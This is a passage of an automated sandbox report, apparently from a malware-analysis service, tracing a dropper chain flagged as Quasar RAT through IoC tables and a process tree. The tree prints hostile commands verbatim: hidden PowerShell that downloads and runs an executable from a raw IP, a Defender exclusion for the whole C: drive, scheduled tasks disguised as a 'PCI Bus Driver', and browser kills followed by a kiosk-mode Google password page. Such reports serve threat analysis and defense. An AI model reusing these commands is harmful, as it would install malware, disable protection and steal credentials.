MSBuild.exe 4396 powershell.exe 4396 powershell.exe 4396 powershell.exe 1092 MSBuild.exe 1092 MSBuild.exe 1092 MSBuild.exe 1092 MSBuild.exe 6936 powershell.exe 6936 powershell.exe 6936 powershell.exe 4740 MSBuild.exe 4740 MSBuild.exe 4740 MSBuild.exe 4740 MSBuild.exe 7284 qQFhOl1.exe -
Suspicious behavior: LoadsDriver 5 IoCs
pid Process 1440 tzutil.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4452 xu5e1_003.exe 4452 xu5e1_003.exe 4452 xu5e1_003.exe -
Suspicious use of AdjustPrivilegeToken 53 IoCs
description pid Process Token: SeDebugPrivilege 3648 taskkill.exe Token: SeDebugPrivilege 6088 tasklist.exe Token: SeDebugPrivilege 2904 qQFhOl1.exe Token: SeDebugPrivilege 2904 qQFhOl1.exe Token: SeDebugPrivilege 5596 InstallUtil.exe Token: SeDebugPrivilege 4172 powershell.exe Token: SeDebugPrivilege 6492 powershell.exe Token: SeDebugPrivilege 6404 powershell.exe Token: SeDebugPrivilege 6396 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeDebugPrivilege 4396 powershell.exe Token: SeLoadDriverPrivilege 1440 tzutil.exe Token: SeDebugPrivilege 6936 powershell.exe Token: SeDebugPrivilege 6896 taskkill.exe Token: SeDebugPrivilege 7284 qQFhOl1.exe Token: SeDebugPrivilege 7284 qQFhOl1.exe Token: SeDebugPrivilege 9456 0ff9cf46.exe Token: SeBackupPrivilege 9456 0ff9cf46.exe Token: SeRestorePrivilege 9456 0ff9cf46.exe Token: SeLoadDriverPrivilege 9456 0ff9cf46.exe Token: SeShutdownPrivilege 9456 0ff9cf46.exe Token: SeSystemEnvironmentPrivilege 9456 0ff9cf46.exe Token: SeSecurityPrivilege 9456 0ff9cf46.exe Token: SeBackupPrivilege 9456 0ff9cf46.exe Token: SeRestorePrivilege 9456 0ff9cf46.exe Token: SeDebugPrivilege 9456 0ff9cf46.exe Token: SeSystemEnvironmentPrivilege 9456 0ff9cf46.exe Token: SeSecurityPrivilege 9456 0ff9cf46.exe Token: SeCreatePermanentPrivilege 9456 0ff9cf46.exe Token: SeShutdownPrivilege 9456 0ff9cf46.exe Token: SeLoadDriverPrivilege 9456 0ff9cf46.exe Token: SeIncreaseQuotaPrivilege 9456 0ff9cf46.exe Token: SeSecurityPrivilege 9456 0ff9cf46.exe Token: SeSystemProfilePrivilege 9456 0ff9cf46.exe Token: SeDebugPrivilege 9456 0ff9cf46.exe Token: SeMachineAccountPrivilege 9456 0ff9cf46.exe Token: SeCreateTokenPrivilege 9456 0ff9cf46.exe Token: SeAssignPrimaryTokenPrivilege 9456 0ff9cf46.exe Token: SeTcbPrivilege 9456 0ff9cf46.exe Token: SeAuditPrivilege 9456 0ff9cf46.exe Token: SeSystemEnvironmentPrivilege 9456 0ff9cf46.exe Token: SeLoadDriverPrivilege 9456 0ff9cf46.exe Token: SeLoadDriverPrivilege 9456 0ff9cf46.exe Token: SeIncreaseQuotaPrivilege 9456 0ff9cf46.exe Token: SeSecurityPrivilege 9456 0ff9cf46.exe Token: SeSystemProfilePrivilege 9456 0ff9cf46.exe Token: SeDebugPrivilege 9456 0ff9cf46.exe Token: SeMachineAccountPrivilege 9456 0ff9cf46.exe Token: SeCreateTokenPrivilege 9456 0ff9cf46.exe Token: SeAssignPrimaryTokenPrivilege 9456 0ff9cf46.exe Token: SeTcbPrivilege 9456 0ff9cf46.exe Token: SeAuditPrivilege 9456 0ff9cf46.exe Token: SeSystemEnvironmentPrivilege 9456 0ff9cf46.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 5476 a910f73ee1f155ed585016e76cf5532c.exe 2456 5b577e2568.exe 2456 5b577e2568.exe 2456 5b577e2568.exe 6660 6c8fb0ab10.exe 6660 6c8fb0ab10.exe 6660 6c8fb0ab10.exe -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 2456 5b577e2568.exe 2456 5b577e2568.exe 2456 5b577e2568.exe 6660 6c8fb0ab10.exe 6660 6c8fb0ab10.exe 6660 6c8fb0ab10.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5596 InstallUtil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5476 wrote to memory of 3452 5476 a910f73ee1f155ed585016e76cf5532c.exe 88 PID 5476 wrote to memory of 3452 5476 a910f73ee1f155ed585016e76cf5532c.exe 88 PID 5476 wrote to memory of 3452 5476 a910f73ee1f155ed585016e76cf5532c.exe 88 PID 3452 wrote to memory of 3536 3452 rapes.exe 95 PID 3452 wrote to memory of 3536 3452 rapes.exe 95 PID 3452 wrote to memory of 3536 3452 rapes.exe 95 PID 3452 wrote to memory of 2868 3452 rapes.exe 97 PID 3452 wrote to memory of 2868 3452 rapes.exe 97 PID 3452 wrote to memory of 2868 3452 rapes.exe 97 PID 3452 wrote to memory of 3996 3452 rapes.exe 99 PID 3452 wrote to memory of 3996 3452 rapes.exe 99 PID 3996 wrote to memory of 3648 3996 01.exe 100 PID 3996 wrote to memory of 3648 3996 01.exe 100 PID 3996 wrote to memory of 5148 3996 01.exe 102 PID 3996 wrote to memory of 5148 3996 01.exe 102 PID 3996 wrote to memory of 4124 3996 01.exe 104 PID 3996 wrote to memory of 4124 3996 01.exe 104 PID 3996 wrote to memory of 1648 3996 01.exe 106 PID 3996 wrote to memory of 1648 3996 01.exe 106 PID 3996 wrote to memory of 404 3996 01.exe 107 PID 3996 wrote to memory of 404 3996 01.exe 107 PID 404 wrote to memory of 4272 404 cmd.exe 109 PID 404 wrote to memory of 4272 404 cmd.exe 109 PID 1648 wrote to memory of 2156 1648 busdrv.exe 111 PID 1648 wrote to memory of 2156 1648 busdrv.exe 111 PID 2156 wrote to memory of 6088 2156 download_807fb6fd5024da68.exe 112 PID 2156 wrote to memory of 6088 2156 download_807fb6fd5024da68.exe 112 PID 2156 wrote to memory of 752 2156 download_807fb6fd5024da68.exe 114 PID 2156 wrote to memory of 752 2156 download_807fb6fd5024da68.exe 114 PID 2156 wrote to memory of 3876 2156 download_807fb6fd5024da68.exe 116 PID 2156 wrote to memory of 3876 2156 download_807fb6fd5024da68.exe 116 PID 2156 wrote to memory of 2308 2156 download_807fb6fd5024da68.exe 119 PID 2156 wrote to memory of 2308 2156 download_807fb6fd5024da68.exe 119 PID 2156 wrote to memory of 3564 2156 download_807fb6fd5024da68.exe 120 PID 2156 wrote to memory of 3564 2156 download_807fb6fd5024da68.exe 120 PID 3564 wrote to memory of 2612 3564 cmd.exe 122 PID 3564 wrote to memory of 2612 3564 cmd.exe 122 PID 3452 wrote to memory of 4620 3452 rapes.exe 123 PID 3452 wrote to memory of 4620 3452 rapes.exe 123 PID 4620 wrote to memory of 1304 4620 RTH4oNP.exe 126 PID 4620 wrote to memory of 1304 4620 RTH4oNP.exe 126 PID 4620 wrote to memory of 1304 4620 RTH4oNP.exe 126 PID 4620 wrote to memory of 1304 4620 RTH4oNP.exe 126 PID 4620 wrote to memory of 1304 4620 RTH4oNP.exe 126 PID 4620 wrote to memory of 1304 4620 RTH4oNP.exe 126 PID 4620 wrote to memory of 1304 4620 RTH4oNP.exe 126 PID 4620 wrote to memory of 1304 4620 RTH4oNP.exe 126 PID 4620 wrote to memory of 1304 4620 RTH4oNP.exe 126 PID 3452 wrote to memory of 2904 3452 rapes.exe 130 PID 3452 wrote to memory of 2904 3452 rapes.exe 130 PID 3452 wrote to memory of 2904 3452 rapes.exe 130 PID 2904 wrote to memory of 5596 2904 qQFhOl1.exe 131 PID 2904 wrote to memory of 5596 2904 qQFhOl1.exe 131 PID 2904 wrote to memory of 5596 2904 qQFhOl1.exe 131 PID 2904 wrote to memory of 5596 2904 qQFhOl1.exe 131 PID 2904 wrote to memory of 5596 2904 qQFhOl1.exe 131 PID 2904 wrote to memory of 5596 2904 qQFhOl1.exe 131 PID 2904 wrote to memory of 5596 2904 qQFhOl1.exe 131 PID 2904 wrote to memory of 5596 2904 qQFhOl1.exe 131 PID 3452 wrote to memory of 4276 3452 rapes.exe 132 PID 3452 wrote to memory of 4276 3452 rapes.exe 132 PID 3452 wrote to memory of 4276 3452 rapes.exe 132 PID 4276 wrote to memory of 2856 4276 5d8dc0c07d.exe 133 PID 4276 wrote to memory of 2856 4276 5d8dc0c07d.exe 133 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3548
-
C:\Users\Admin\AppData\Local\Temp\a910f73ee1f155ed585016e76cf5532c.exe"C:\Users\Admin\AppData\Local\Temp\a910f73ee1f155ed585016e76cf5532c.exe"2⤵
- Quasar RAT
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5476 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3452 -
C:\Users\Admin\AppData\Local\Temp\10320830101\844eeb687f.exe"C:\Users\Admin\AppData\Local\Temp\10320830101\844eeb687f.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3536
-
-
C:\Users\Admin\AppData\Local\Temp\10320920101\iqvtNlb.exe"C:\Users\Admin\AppData\Local\Temp\10320920101\iqvtNlb.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2868
-
-
C:\Users\Admin\AppData\Local\Temp\10324120101\01.exe"C:\Users\Admin\AppData\Local\Temp\10324120101\01.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\system32\taskkill.exe"taskkill" /f /im pcidrv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3648
-
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "PCI Bus Driver" /tr C:\Users\Admin\Drivers\busdrv.exe /sc minute /mo 1 /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:5148
-
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Users\Admin\Drivers\busdrv.exe /sc onstart /ru SYSTEM /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4124
-
-
C:\Users\Admin\Drivers\busdrv.exe"C:\Users\Admin\Drivers\busdrv.exe"5⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Users\Admin\AppData\Local\Temp\download_807fb6fd5024da68.exe"C:\Users\Admin\AppData\Local\Temp\download_807fb6fd5024da68.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6088
-
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "PCI Bus Driver" /tr C:\Users\Admin\Drivers\pcidrv.exe /sc minute /mo 1 /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:752
-
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Users\Admin\Drivers\pcidrv.exe /sc onstart /ru SYSTEM /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:3876
-
-
C:\Users\Admin\Drivers\pcidrv.exe"C:\Users\Admin\Drivers\pcidrv.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2308
-
-
C:\Windows\system32\cmd.exe"cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\download_807fb6fd5024da68.exe7⤵
- Suspicious use of WriteProcessMemory
PID:3564 -
C:\Windows\system32\timeout.exetimeout /t 28⤵
- Delays execution with timeout.exe
PID:2612
-
-
-
-
-
C:\Windows\system32\cmd.exe"cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10324120101\01.exe5⤵
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\system32\timeout.exetimeout /t 26⤵
- Delays execution with timeout.exe
PID:4272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10325120101\RTH4oNP.exe"C:\Users\Admin\AppData\Local\Temp\10325120101\RTH4oNP.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1304
-
-
-
C:\Users\Admin\AppData\Local\Temp\10325760101\qQFhOl1.exe"C:\Users\Admin\AppData\Local\Temp\10325760101\qQFhOl1.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2904
-
-
C:\Users\Admin\AppData\Local\Temp\10328870101\5d8dc0c07d.exe"C:\Users\Admin\AppData\Local\Temp\10328870101\5d8dc0c07d.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10328870101\5d8dc0c07d.exe"5⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2856
-
-
-
C:\Users\Admin\AppData\Local\Temp\10328880101\d156e36d9d.exe"C:\Users\Admin\AppData\Local\Temp\10328880101\d156e36d9d.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5560 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10328880101\d156e36d9d.exe"5⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5456
-
-
-
C:\Users\Admin\AppData\Local\Temp\10328890101\5b577e2568.exe"C:\Users\Admin\AppData\Local\Temp\10328890101\5b577e2568.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2456 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn yxkS9ma0Nck /tr "mshta C:\Users\Admin\AppData\Local\Temp\HncHjuTTw.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
PID:4868 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn yxkS9ma0Nck /tr "mshta C:\Users\Admin\AppData\Local\Temp\HncHjuTTw.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4408
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\HncHjuTTw.hta5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2588 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZGBFEZEKBFNHTJHX2J5PUWKRLOM0QLUG.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4172 -
C:\Users\Admin\AppData\Local\TempZGBFEZEKBFNHTJHX2J5PUWKRLOM0QLUG.EXE"C:\Users\Admin\AppData\Local\TempZGBFEZEKBFNHTJHX2J5PUWKRLOM0QLUG.EXE"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6392
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10328900121\am_no.cmd" "4⤵
- System Location Discovery: System Language Discovery
PID:60 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:6952 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:6484 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:6368 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6396
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "pErH2mavlkR" /tr "mshta \"C:\Temp\LpvcoZ31q.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:6164
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\LpvcoZ31q.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:688 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1372
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10328910101\iqvtNlb.exe"C:\Users\Admin\AppData\Local\Temp\10328910101\iqvtNlb.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6200
-
-
C:\Users\Admin\AppData\Local\Temp\10328920101\tK0oYx3.exe"C:\Users\Admin\AppData\Local\Temp\10328920101\tK0oYx3.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6212 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5808
-
-
-
C:\Users\Admin\AppData\Local\Temp\10328930101\xu5e1_003.exe"C:\Users\Admin\AppData\Local\Temp\10328930101\xu5e1_003.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4452 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'5⤵PID:2420
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4396
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"5⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:6072 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""6⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6936
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""6⤵
- Deletes itself
- Executes dropped EXE
PID:4424 -
C:\Users\Admin\AppData\Local\Temp\{3c4e5211-816b-497f-a023-2aabc919cb71}\1ab149dc.exe"C:\Users\Admin\AppData\Local\Temp\{3c4e5211-816b-497f-a023-2aabc919cb71}\1ab149dc.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot7⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:7972 -
C:\Users\Admin\AppData\Local\Temp\{0ce3d9b0-aa83-4522-8501-aaab05904cda}\0ff9cf46.exeC:/Users/Admin/AppData/Local/Temp/{0ce3d9b0-aa83-4522-8501-aaab05904cda}/\0ff9cf46.exe -accepteula -adinsilent -silent -processlevel 2 -postboot8⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:9456
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10328940101\RTH4oNP.exe"C:\Users\Admin\AppData\Local\Temp\10328940101\RTH4oNP.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6740 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵PID:3084
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1092
-
-
-
C:\Users\Admin\AppData\Local\Temp\10328960101\01.exe"C:\Users\Admin\AppData\Local\Temp\10328960101\01.exe"4⤵
- Executes dropped EXE
PID:6944 -
C:\Windows\system32\taskkill.exe"taskkill" /f /im pcidrv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6896
-
-
-
C:\Users\Admin\AppData\Local\Temp\10328970101\OkH8IPF.exe"C:\Users\Admin\AppData\Local\Temp\10328970101\OkH8IPF.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6324 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4740
-
-
-
C:\Users\Admin\AppData\Local\Temp\10328980101\qQFhOl1.exe"C:\Users\Admin\AppData\Local\Temp\10328980101\qQFhOl1.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7284
-
-
C:\Users\Admin\AppData\Local\Temp\10328990101\d2c2d62ab1.exe"C:\Users\Admin\AppData\Local\Temp\10328990101\d2c2d62ab1.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7896 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵PID:8012
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
PID:8040
-
-
-
C:\Users\Admin\AppData\Local\Temp\10329000101\b2cae45d85.exe"C:\Users\Admin\AppData\Local\Temp\10329000101\b2cae45d85.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:10148
-
-
C:\Users\Admin\AppData\Local\Temp\10329010101\bfb32a0700.exe"C:\Users\Admin\AppData\Local\Temp\10329010101\bfb32a0700.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:12692
-
-
C:\Users\Admin\AppData\Local\Temp\10329020101\6c8fb0ab10.exe"C:\Users\Admin\AppData\Local\Temp\10329020101\6c8fb0ab10.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6660 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T5⤵
- Kills process with taskkill
PID:13188
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T5⤵
- Kills process with taskkill
PID:13380
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T5⤵
- Kills process with taskkill
PID:13728
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T5⤵
- Kills process with taskkill
PID:13956
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T5⤵
- Kills process with taskkill
PID:14080
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking5⤵PID:10376
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking6⤵PID:3516
-
